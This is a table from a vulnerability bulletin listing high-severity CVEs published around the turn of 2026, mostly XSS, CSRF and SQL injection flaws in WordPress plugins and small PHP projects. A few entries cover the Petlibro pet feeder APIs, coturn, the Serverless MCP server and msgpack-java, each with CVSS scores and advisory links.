| Rakessh--Ads24 Lite | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rakessh Ads24 Lite allows Reflected XSS.This issue affects Ads24 Lite: from n/a through 1.0. | 2025-12-29 | 7.1 | CVE-2025-23458 | https://vdp.patchstack.com/database/wordpress/plugin/wp-ad-management/vulnerability/wordpress-ads24-lite-plugin-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Sleekplan--Sleekplan | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sleekplan allows Reflected XSS.This issue affects Sleekplan: from n/a through 0.2.0. | 2025-12-29 | 7.1 | CVE-2025-23469 | https://vdp.patchstack.com/database/wordpress/plugin/sleekplan/vulnerability/wordpress-sleekplan-plugin-0-2-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Kemal YAZICI--Product Puller | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kemal YAZICI Product Puller allows Reflected XSS.This issue affects Product Puller: from n/a through 1.5.1. | 2025-12-29 | 7.1 | CVE-2025-23550 | https://vdp.patchstack.com/database/wordpress/plugin/product-puller/vulnerability/wordpress-product-puller-plugin-1-5-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Jakub Glos--Off Page SEO | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jakub Glos Off Page SEO allows Reflected XSS.This issue affects Off Page SEO: from n/a through 3.0.3. | 2025-12-29 | 7.1 | CVE-2025-23554 | https://vdp.patchstack.com/database/wordpress/plugin/off-page-seo/vulnerability/wordpress-off-page-seo-plugin-3-0-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Omar Mohamed Mohamoud--LIVE TV | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Omar Mohamed Mohamoud LIVE TV allows Reflected XSS.This issue affects LIVE TV: from n/a through 1.2. | 2025-12-31 | 7.1 | CVE-2025-23608 | https://vdp.patchstack.com/database/wordpress/plugin/live-tv/vulnerability/wordpress-live-tv-plugin-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Christopher Churchill--custom-post-edit | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Christopher Churchill allows Reflected XSS.This issue affects custom-post-edit: from n/a through 1.0.4. | 2025-12-31 | 7.1 | CVE-2025-23667 | https://vdp.patchstack.com/database/wordpress/plugin/front-end-post-edit/vulnerability/wordpress-custom-post-edit-plugin-1-0-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Terry Zielke--Zielke Design Project Gallery | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Terry Zielke Zielke Design Project Gallery allows Reflected XSS.This issue affects Zielke Design Project Gallery: from n/a through 2.5.0. | 2025-12-31 | 7.1 | CVE-2025-23705 | https://vdp.patchstack.com/database/wordpress/plugin/zielke-design-project-gallery/vulnerability/wordpress-zielke-design-project-gallery-plugin-2-5-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Matamko--En Masse | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Matamko En Masse allows Reflected XSS.This issue affects En Masse: from n/a through 1.0. | 2025-12-31 | 7.1 | CVE-2025-23707 | https://vdp.patchstack.com/database/wordpress/plugin/en-masse-wp/vulnerability/wordpress-en-masse-plugin-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| zckevin--ZhinaTwitterWidget | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in zckevin ZhinaTwitterWidget allows Reflected XSS.This issue affects ZhinaTwitterWidget: from n/a through 1.0. | 2025-12-31 | 7.1 | CVE-2025-23719 | https://vdp.patchstack.com/database/wordpress/plugin/zhina-twitter-widget/vulnerability/wordpress-zhinatwitterwidget-plugin-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Proloy Chakroborty--ZD Scribd iPaper | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Proloy Chakroborty ZD Scribd iPaper allows Reflected XSS.This issue affects ZD Scribd iPaper: from n/a through 1.0. | 2025-12-31 | 7.1 | CVE-2025-23757 | https://vdp.patchstack.com/database/wordpress/plugin/zd-scribd-ipaper/vulnerability/wordpress-zd-scribd-ipaper-plugin-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Themefy--Bloggie | Cross-Site Request Forgery (CSRF) vulnerability in Themefy Bloggie allows Reflected XSS.This issue affects Bloggie: from n/a through 2.0.8. | 2025-12-31 | 7.1 | CVE-2025-31054 | https://vdp.patchstack.com/database/wordpress/theme/bloggie/vulnerability/wordpress-bloggie-2-0-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Petlibrio--Smart Pet Feeder Platform | Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contains an authorization bypass vulnerability that allows unauthorized users to add users as shared owners to any device by exploiting missing permission checks. Attackers can send requests to the device share API to gain unauthorized access to devices and view owner information without proper authorization validation. | 2026-01-03 | 7.3 | CVE-2025-3646 | Security Research: Petlibro: Your Pet Feeder Is Feeding Data To Anyone Who Asks VulnCheck Advisory: Petlibro Smart Pet Feeder Platform through 1.7.31 Authorization Bypass via Device Share API |
| Petlibrio--Smart Pet Feeder Platform | Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contains an improper access control vulnerability that allows unauthorized device manipulation by accepting arbitrary serial numbers without ownership verification. Attackers can control any device by sending serial numbers to device control APIs to change feeding schedules, trigger manual feeds, access camera feeds, and modify device settings without authorization checks. | 2026-01-03 | 7.3 | CVE-2025-3653 | Security Research: Petlibro: Your Pet Feeder Is Feeding Data To Anyone Who Asks VulnCheck Advisory: Petlibro Smart Pet Feeder through 1.7.31 Platform Improper Access Control via API endpoint |
| ZoomSounds--ZoomSounds | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ZoomSounds allows Reflected XSS.This issue affects ZoomSounds: from n/a through 6.91. | 2025-12-31 | 7.1 | CVE-2025-47566 | https://vdp.patchstack.com/database/wordpress/plugin/dzs-zoomsounds/vulnerability/wordpress-zoomsounds-plugin-6-91-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Zoho Mail--Zoho ZeptoMail | Cross-Site Request Forgery (CSRF) vulnerability in Zoho Mail Zoho ZeptoMail allows Stored XSS.This issue affects Zoho ZeptoMail: from n/a through 3.3.1. | 2025-12-31 | 7.1 | CVE-2025-49028 | https://vdp.patchstack.com/database/wordpress/plugin/transmail/vulnerability/wordpress-zoho-zeptomail-plugin-3-3-1-cross-site-request-forgery-csrf-to-stored-xss-vulnerability?_s_id=cve |
| Wolfgang Hfelinger--Custom Style | Cross-Site Request Forgery (CSRF) vulnerability in Wolfgang Häfelinger Custom Style allows Stored XSS.This issue affects Custom Style: from n/a through 1.0. | 2025-12-31 | 7.1 | CVE-2025-49342 | https://vdp.patchstack.com/database/wordpress/plugin/custom-style/vulnerability/wordpress-custom-style-plugin-1-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Socialprofilr--Social Profilr | Cross-Site Request Forgery (CSRF) vulnerability in Socialprofilr Social Profilr allows Stored XSS.This issue affects Social Profilr: from n/a through 1.0. | 2025-12-31 | 7.1 | CVE-2025-49343 | https://vdp.patchstack.com/database/wordpress/plugin/social-profilr-display-social-network-profile/vulnerability/wordpress-social-profilr-plugin-1-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Rene Ade--SensitiveTagCloud | Cross-Site Request Forgery (CSRF) vulnerability in Rene Ade SensitiveTagCloud allows Stored XSS.This issue affects SensitiveTagCloud: from n/a through 1.4.1. | 2025-12-31 | 7.1 | CVE-2025-49344 | https://vdp.patchstack.com/database/wordpress/plugin/sensitive-tag-cloud/vulnerability/wordpress-sensitivetagcloud-plugin-1-4-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| mg12--WP-EasyArchives | Cross-Site Request Forgery (CSRF) vulnerability in mg12 WP-EasyArchives allows Stored XSS.This issue affects WP-EasyArchives: from n/a through 3.1.2. | 2025-12-31 | 7.1 | CVE-2025-49345 | https://vdp.patchstack.com/database/wordpress/plugin/wp-easyarchives/vulnerability/wordpress-wp-easyarchives-plugin-3-1-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Peter Sterling--Simple Archive Generator | Cross-Site Request Forgery (CSRF) vulnerability in Peter Sterling Simple Archive Generator allows Stored XSS.This issue affects Simple Archive Generator: from n/a through 5.2. | 2025-12-31 | 7.1 | CVE-2025-49346 | https://vdp.patchstack.com/database/wordpress/plugin/simple-archive-generator/vulnerability/wordpress-simple-archive-generator-plugin-5-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Marcin Kijak--Noindex by Path | Cross-Site Request Forgery (CSRF) vulnerability in Marcin Kijak Noindex by Path allows Stored XSS.This issue affects Noindex by Path: from n/a through 1.0. | 2025-12-31 | 7.1 | CVE-2025-49353 | https://vdp.patchstack.com/database/wordpress/plugin/noindex-by-path/vulnerability/wordpress-noindex-by-path-plugin-1-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Mindstien Technologies--Recent Posts From Each Category | Cross-Site Request Forgery (CSRF) vulnerability in Mindstien Technologies Recent Posts From Each Category allows Stored XSS.This issue affects Recent Posts From Each Category: from n/a through 1.4. | 2025-12-31 | 7.1 | CVE-2025-49354 | https://vdp.patchstack.com/database/wordpress/plugin/recent-posts-from-each-category/vulnerability/wordpress-recent-posts-from-each-category-plugin-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| nebelhorn--Blappsta Mobile App Plugin – Your native, mobile iPhone App and Android App | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in nebelhorn Blappsta Mobile App Plugin & Your native, mobile iPhone App and Android App allows Reflected XSS.This issue affects Blappsta Mobile App Plugin – Your native, mobile iPhone App and Android App: from n/a through 0.8.8.8. | 2025-12-31 | 7.1 | CVE-2025-50053 | https://vdp.patchstack.com/database/wordpress/plugin/yournewsapp/vulnerability/wordpress-blappsta-mobile-app-plugin-your-native-mobile-iphone-app-and-android-app-plugin-0-8-8-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| uxper--Sala | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in uxper Sala allows Reflected XSS.This issue affects Sala: from n/a through 1.1.3. | 2025-12-31 | 7.1 | CVE-2025-52739 | https://vdp.patchstack.com/database/wordpress/theme/sala/vulnerability/wordpress-sala-theme-1-1-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| osuthorpe--Easy Social | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in osuthorpe Easy Social allows Reflected XSS.This issue affects Easy Social: from n/a through 1.3. | 2025-12-31 | 7.1 | CVE-2025-53235 | https://vdp.patchstack.com/database/wordpress/plugin/easy-social-media/vulnerability/wordpress-easy-social-plugin-1-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Kopek Reem--ReKord client | CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') | 2026-01-01 | 7.5 | CVE-2025-55065 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 |
| Appointify--Appointify | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Appointify allows Blind SQL Injection.This issue affects Appointify: from n/a through 1.0.8. | 2025-12-30 | 7.6 | CVE-2025-59129 | https://vdp.patchstack.com/database/wordpress/plugin/appointify/vulnerability/wordpress-appointify-plugin-1-0-8-sql-injection-vulnerability?_s_id=cve |
| Hoernerfranz--WP-CalDav2ICS | Cross-Site Request Forgery (CSRF) vulnerability in Hoernerfranz WP-CalDav2ICS allows Stored XSS.This issue affects WP-CalDav2ICS: from n/a through 1.3.4. | 2025-12-30 | 7.1 | CVE-2025-59131 | https://vdp.patchstack.com/database/wordpress/plugin/wp-caldav2ics/vulnerability/wordpress-wp-caldav2ics-plugin-1-3-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| eLEOPARD--Behance Portfolio Manager | Cross-Site Request Forgery (CSRF) vulnerability in eLEOPARD Behance Portfolio Manager allows Stored XSS.This issue affects Behance Portfolio Manager: from n/a through 1.7.5. | 2025-12-31 | 7.1 | CVE-2025-59137 | https://vdp.patchstack.com/database/wordpress/plugin/portfolio-manager-powered-by-behance/vulnerability/wordpress-behance-portfolio-manager-plugin-1-7-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| MadrasThemes--MAS Videos | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in MadrasThemes MAS Videos allows PHP Local File Inclusion.This issue affects MAS Videos: from n/a through 1.3.2. | 2025-12-30 | 7.5 | CVE-2025-62753 | https://vdp.patchstack.com/database/wordpress/plugin/masvideos/vulnerability/wordpress-mas-videos-plugin-1-3-2-local-file-inclusion-vulnerability?_s_id=cve |
| Emraan Cheema--CubeWP | Missing Authorization vulnerability in Emraan Cheema CubeWP allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects CubeWP: from n/a through 1.1.27. | 2025-12-29 | 7.5 | CVE-2025-68036 | https://vdp.patchstack.com/database/wordpress/plugin/cubewp-framework/vulnerability/wordpress-cubewp-plugin-1-1-27-broken-access-control-vulnerability?_s_id=cve |
| SignalK--signalk-server | Signal K Server is a server application that runs on a central hub in a boat. A Denial of Service (DoS) vulnerability in versions prior to 2.19.0 allows an unauthenticated attacker to crash the SignalK Server by flooding the access request endpoint (`/signalk/v1/access/requests`). This causes a "JavaScript heap out of memory" error due to unbounded in-memory storage of request objects. Version 2.19.0 fixes the issue. | 2026-01-01 | 7.5 | CVE-2025-68272 | https://github.com/SignalK/signalk-server/security/advisories/GHSA-7rqc-ff8m-7j23 https://github.com/SignalK/signalk-server/releases/tag/v2.19.0 |
| Plugin Optimizer--Plugin Optimizer | Missing Authorization vulnerability in Plugin Optimizer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Plugin Optimizer: from n/a through 1.3.7. | 2025-12-29 | 7.1 | CVE-2025-68861 | https://vdp.patchstack.com/database/wordpress/plugin/plugin-optimizer/vulnerability/wordpress-plugin-optimizer-plugin-1-3-7-broken-access-control-vulnerability?_s_id=cve |
| reDim GmbH--CookieHint WP | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in reDim GmbH CookieHint WP allows PHP Local File Inclusion.This issue affects CookieHint WP: from n/a through 1.0.0. | 2025-12-29 | 7.5 | CVE-2025-68870 | https://vdp.patchstack.com/database/wordpress/plugin/cookiehint-wp/vulnerability/wordpress-cookiehint-wp-plugin-1-0-0-local-file-inclusion-vulnerability?_s_id=cve |
| INVELITY--Invelity SPS connect | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in INVELITY Invelity SPS connect allows Reflected XSS.This issue affects Invelity SPS connect: from n/a through 1.0.8. | 2025-12-29 | 7.1 | CVE-2025-68876 | https://vdp.patchstack.com/database/wordpress/plugin/invelity-sps-connect/vulnerability/wordpress-invelity-sps-connect-plugin-1-0-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CedCommerce--CedCommerce Integration for Good Market | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in CedCommerce CedCommerce Integration for Good Market allows PHP Local File Inclusion.This issue affects CedCommerce Integration for Good Market: from n/a through 1.0.6. | 2025-12-29 | 7.5 | CVE-2025-68877 | https://vdp.patchstack.com/database/wordpress/plugin/ced-good-market-integration/vulnerability/wordpress-cedcommerce-integration-for-good-market-plugin-1-0-6-local-file-inclusion-vulnerability?_s_id=cve |
| Prasadkirpekar--Advanced Custom CSS | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Prasadkirpekar Advanced Custom CSS allows Reflected XSS.This issue affects Advanced Custom CSS: from n/a through 1.1.0. | 2025-12-29 | 7.1 | CVE-2025-68878 | https://vdp.patchstack.com/database/wordpress/plugin/advanced-custom-css/vulnerability/wordpress-advanced-custom-css-plugin-1-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Councilsoft--Content Grid Slider | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Councilsoft Content Grid Slider allows Reflected XSS.This issue affects Content Grid Slider: from n/a through 1.5. | 2025-12-29 | 7.1 | CVE-2025-68879 | https://vdp.patchstack.com/database/wordpress/plugin/content-grid-slider/vulnerability/wordpress-content-grid-slider-plugin-1-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Page Carbajal--Custom Post Status | Cross-Site Request Forgery (CSRF) vulnerability in Page Carbajal Custom Post Status allows Stored XSS.This issue affects Custom Post Status: from n/a through 1.1.0. | 2025-12-31 | 7.1 | CVE-2025-68885 | https://vdp.patchstack.com/database/wordpress/plugin/custom-post-status/vulnerability/wordpress-custom-post-status-plugin-1-1-0-cross-site-request-forgery-csrf-to-stored-xss-vulnerability?_s_id=cve |
| thorsten--phpMyFAQ | phpMyFAQ is an open source FAQ web application. In versions prior to 4.0.16, an unauthenticated remote attacker can trigger generation of a configuration backup ZIP via `POST /api/setup/backup` and then download the generated ZIP from a web-accessible location. The ZIP contains sensitive configuration files (e.g., `database.php` with database credentials), leading to high-impact information disclosure and potential follow-on compromise. Version 4.0.16 fixes the issue. | 2025-12-29 | 7.5 | CVE-2025-69200 | https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9cg9-4h4f-j6fg https://github.com/thorsten/phpMyFAQ/commit/b0e99ee3695152115841cb546d8dce64ceb8c29a |
| coturn--coturn | coturn is a free open source implementation of TURN and STUN Server. Versions 4.6.2r5 through 4.7.0-r4 have a bad random number generator for nonces and port randomization after refactoring. Additionally, random numbers aren't generated with openssl's RAND_bytes but libc's random() (if it's not running on Windows). When fetching about 50 sequential nonces (i.e., through sending 50 unauthenticated allocations requests) it is possible to completely reconstruct the current state of the random number generator, thereby predicting the next nonce. This allows authentication while spoofing IPs. An attacker can send authenticated messages without ever receiving the responses, including the nonce (requires knowledge of the credentials, which is e.g., often the case in IoT settings). Since the port randomization is deterministic given the pseudorandom seed, an attacker can exactly reconstruct the ports and, hence predict the randomization of the ports. If an attacker allocates a relay port, they know the current port, and they are able to predict the next relay port (at least if it is not used before). Commit 11fc465f4bba70bb0ad8aae17d6c4a63a29917d9 contains a fix. | 2025-12-30 | 7.7 | CVE-2025-69217 | https://github.com/coturn/coturn/security/advisories/GHSA-fvj6-9jhg-9j84 https://github.com/coturn/coturn/commit/11fc465f4bba70bb0ad8aae17d6c4a63a29917d9 https://github.com/coturn/coturn/commit/88ced471385869d7e7fbbc4766e78ef521b36af6 |
| serverless--serverless | The Serverless Framework is a framework for using AWS Lambda and other managed cloud services to build applications. Starting in version 4.29.0 and prior to version 4.29.3, a command injection vulnerability exists in the Serverless Framework's built-in MCP server package (@serverless/mcp). This vulnerability only affects users of the experimental MCP server feature (serverless mcp), which represents less than 0.1% of Serverless Framework users. The core Serverless Framework CLI and deployment functionality are not affected. The vulnerability is caused by the unsanitized use of input parameters within a call to `child_process.exec`, enabling an attacker to inject arbitrary system commands. Successful exploitation can lead to remote code execution under the server process's privileges. The server constructs and executes shell commands using unvalidated user input directly within command-line strings. This introduces the possibility of shell metacharacter injection (`|`, `>`, `&&`, etc.). Version 4.29.3 fixes the issue. | 2025-12-30 | 7.5 | CVE-2025-69256 | https://github.com/serverless/serverless/security/advisories/GHSA-rwc2-f344-q6w6 https://github.com/serverless/serverless/commit/681ca039550c7169369f98780c6301a00f2dc4c4 https://github.com/serverless/serverless/blob/6213453da7df375aaf12fb3522ab8870488fc59a/packages/mcp/src/tools/list-projects.js#L68 https://github.com/serverless/serverless/releases/tag/sf-core%404.29.3 |
| Plex--Media Server | In Plex Media Server (PMS) through 1.42.2.10156, ability to access /myplex/account with a device token is not properly aligned with whether the device is currently associated with an account. | 2026-01-02 | 7.1 | CVE-2025-69415 | https://github.com/lufinkey/vulnerability-research/blob/main/CVE-2025-34158/README.md |
| itsourcecode--School Management System | A security flaw has been discovered in itsourcecode School Management System 1.0. This affects an unknown part of the file /student/index.php. The manipulation of the argument ID results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. | 2026-01-01 | 7.3 | CVE-2026-0544 | VDB-339331 | itsourcecode School Management System index.php sql injection VDB-339331 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #728909 | itsourcecode School Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/31 https://itsourcecode.com/ |
| code-projects--Content Management System | A vulnerability was determined in code-projects Content Management System 1.0. This impacts an unknown function of the file search.php. This manipulation of the argument Value causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. | 2026-01-02 | 7.3 | CVE-2026-0546 | VDB-339338 | code-projects Content Management System search.php sql injection VDB-339338 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #728924 | Code-projects Content Management System v1.0 SQL Injection https://github.com/gtxy114514/CVE/issues/1 https://code-projects.org/ |
| code-projects--Content Management System | A weakness has been identified in code-projects Content Management System 1.0. This issue affects some unknown processing of the file /admin/delete.php. Executing manipulation of the argument del can lead to sql injection. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. | 2026-01-02 | 7.3 | CVE-2026-0565 | VDB-339377 | code-projects Content Management System delete.php sql injection VDB-339377 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #729227 | Code-projects Content Management System v1.0 SQL Injection https://github.com/Limingqian123/CVE/issues/12 https://code-projects.org/ |
| code-projects--Content Management System | A vulnerability was detected in code-projects Content Management System 1.0. The affected element is an unknown function of the file /pages.php. The manipulation of the argument ID results in sql injection. The attack may be performed from remote. The exploit is now public and may be used. | 2026-01-02 | 7.3 | CVE-2026-0567 | VDB-339379 | code-projects Content Management System pages.php sql injection VDB-339379 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #729229 | Code-projects Content Management System v1.0 SQL injection https://github.com/Limingqian123/CVE/issues/14 https://code-projects.org/ |
| code-projects--Online Music Site | A flaw has been found in code-projects Online Music Site 1.0. The impacted element is an unknown function of the file /Frontend/ViewSongs.php. This manipulation of the argument ID causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. | 2026-01-02 | 7.3 | CVE-2026-0568 | VDB-339380 | code-projects Online Music Site ViewSongs.php sql injection VDB-339380 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #729251 | Code-projects ONLINE MUSIC SITE v1.0 SQL Injection https://github.com/Limingqian123/CVE/issues/15 https://code-projects.org/ |
| code-projects--Online Music Site | A vulnerability has been found in code-projects Online Music Site 1.0. This affects an unknown function of the file /Frontend/AlbumByCategory.php. Such manipulation of the argument ID leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2026-01-02 | 7.3 | CVE-2026-0569 | VDB-339381 | code-projects Online Music Site AlbumByCategory.php sql injection VDB-339381 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #729252 | Code-projects ONLINE MUSIC SITE v1.0 SQL Injection https://github.com/Limingqian123/CVE/issues/16 https://code-projects.org/ |
| code-projects--Online Music Site | A vulnerability was found in code-projects Online Music Site 1.0. This impacts an unknown function of the file /Frontend/Feedback.php. Performing manipulation of the argument fname results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used. | 2026-01-02 | 7.3 | CVE-2026-0570 | VDB-339382 | code-projects Online Music Site Feedback.php sql injection VDB-339382 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #729253 | Code-projects ONLINE MUSIC SITE v1.0 SQL Injection https://github.com/Limingqian123/CVE/issues/18 https://code-projects.org/ |
| code-projects--Online Product Reservation System | A security vulnerability has been detected in code-projects Online Product Reservation System 1.0. This impacts an unknown function of the file /handgunner-administrator/adminlogin.php of the component Administrator Login. Such manipulation of the argument emailadd/pass leads to sql injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. | 2026-01-04 | 7.3 | CVE-2026-0575 | VDB-339459 | code-projects Online Product Reservation System Administrator Login adminlogin.php sql injection VDB-339459 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731011 | code-projects Online Product Reservation System V1.0 SQL Injection https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_admin_login.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_admin_login.md#poc https://code-projects.org/ |
| code-projects--Online Product Reservation System | A vulnerability was detected in code-projects Online Product Reservation System 1.0. Affected is an unknown function of the file /handgunner-administrator/prod.php of the component Parameter Handler. Performing manipulation of the argument cat/price/name/model/serial results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. | 2026-01-04 | 7.3 | CVE-2026-0576 | VDB-339460 | code-projects Online Product Reservation System Parameter prod.php sql injection VDB-339460 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731012 | code-projects Online Product Reservation system V1.0 SQL Injection https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_add_prod.php.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_add_prod.php.md#poc https://code-projects.org/ |
| code-projects--Online Product Reservation System | A vulnerability has been found in code-projects Online Product Reservation System 1.0. Affected by this issue is some unknown functionality of the file /handgunner-administrator/delete.php. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2026-01-04 | 7.3 | CVE-2026-0578 | VDB-339462 | code-projects Online Product Reservation System delete.php sql injection VDB-339462 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731075 | code-projects Online Product Reservation system in PHP with source code V1.0 SQL Injection https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_admin_delete.php.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_admin_delete.php.md#poc https://code-projects.org/ |
| code-projects--Online Product Reservation System | A vulnerability was found in code-projects Online Product Reservation System 1.0. This affects an unknown part of the file /handgunner-administrator/edit.php of the component POST Parameter Handler. The manipulation of the argument prod_id/name/price/model/serial results in sql injection. The attack can be launched remotely. The exploit has been made public and could be used. | 2026-01-04 | 7.3 | CVE-2026-0579 | VDB-339463 | code-projects Online Product Reservation System POST Parameter edit.php sql injection VDB-339463 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731091 | code-projects Online Product Reservation system V1.0 SQL Injection https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_admin_edit.php.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_admin_edit.php.md#poc https://code-projects.org/ |
| emlog--emlog | Emlog is an open source website building system. Versions up to and including 2.5.19 are vulnerable to server-side Out-of-Band (OOB) requests / SSRF via uploaded SVG files. An attacker can upload a crafted SVG to http[:]//emblog/admin/media[.]php which contains external resource references. When the server processes/renders the SVG (thumbnailing, preview, or sanitization), it issues an HTTP request to the attacker-controlled host. Impact: server-side SSRF/OOB leading to internal network probing and potential metadata/credential exposure. As of time of publication, no known patched versions are available. | 2026-01-02 | 7.7 | CVE-2026-21433 | https://github.com/emlog/emlog/security/advisories/GHSA-6rwr-c8hc-mjj4 |
| bagisto--bagisto | Bagisto is an open source laravel eCommerce platform. Prior to version 2.3.10, an Insecure Direct Object Reference vulnerability in the customer order reorder function allows any authenticated customer to add items from another customer's order to their own shopping cart by manipulating the order ID parameter. This exposes sensitive purchase information and enables potential fraud. Version 2.3.10 patches the issue. | 2026-01-02 | 7.1 | CVE-2026-21447 | https://github.com/bagisto/bagisto/security/advisories/GHSA-x5rw-qvvp-5cgm https://github.com/bagisto/bagisto/commit/b2b1cf62577245d03a68532478cffbe321df74d3 |
| msgpack--msgpack-java | MessagePack for Java is a serializer implementation for Java. A denial-of-service vulnerability exists in versions prior to 0.9.11 when deserializing .msgpack files containing EXT32 objects with attacker-controlled payload lengths. While MessagePack-Java parses extension headers lazily, it later trusts the declared EXT payload length when materializing the extension data. When ExtensionValue.getData() is invoked, the library attempts to allocate a byte array of the declared length without enforcing any upper bound. A malicious .msgpack file of only a few bytes can therefore trigger unbounded heap allocation, resulting in JVM heap exhaustion, process termination, or service unavailability. This vulnerability is triggered during model loading / deserialization, making it a model format vulnerability suitable for remote exploitation. The vulnerability enables a remote denial-of-service attack against applications that deserialize untrusted .msgpack model files using MessagePack for Java. A specially crafted but syntactically valid .msgpack file containing an EXT32 object with an attacker-controlled, excessively large payload length can trigger unbounded memory allocation during deserialization. When the model file is loaded, the library trusts the declared length metadata and attempts to allocate a byte array of that size, leading to rapid heap exhaustion, excessive garbage collection, or immediate JVM termination with an OutOfMemoryError. The attack requires no malformed bytes, user interaction, or elevated privileges and can be exploited remotely in real-world environments such as model registries, inference services, CI/CD pipelines, and cloud-based model hosting platforms that accept or fetch .msgpack artifacts. Because the malicious file is extremely small yet valid, it can bypass basic validation and scanning mechanisms, resulting in complete service unavailability and potential cascading failures in production systems. Version 0.9.11 fixes the vulnerability. | 2026-01-02 | 7.5 | CVE-2026-21452 | https://github.com/msgpack/msgpack-java/security/advisories/GHSA-cw39-r4h6-8j3x https://github.com/msgpack/msgpack-java/commit/daa2ea6b2f11f500e22c70a22f689f7a9debdeae https://github.com/msgpack/msgpack-java/releases/tag/v0.9.11 |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
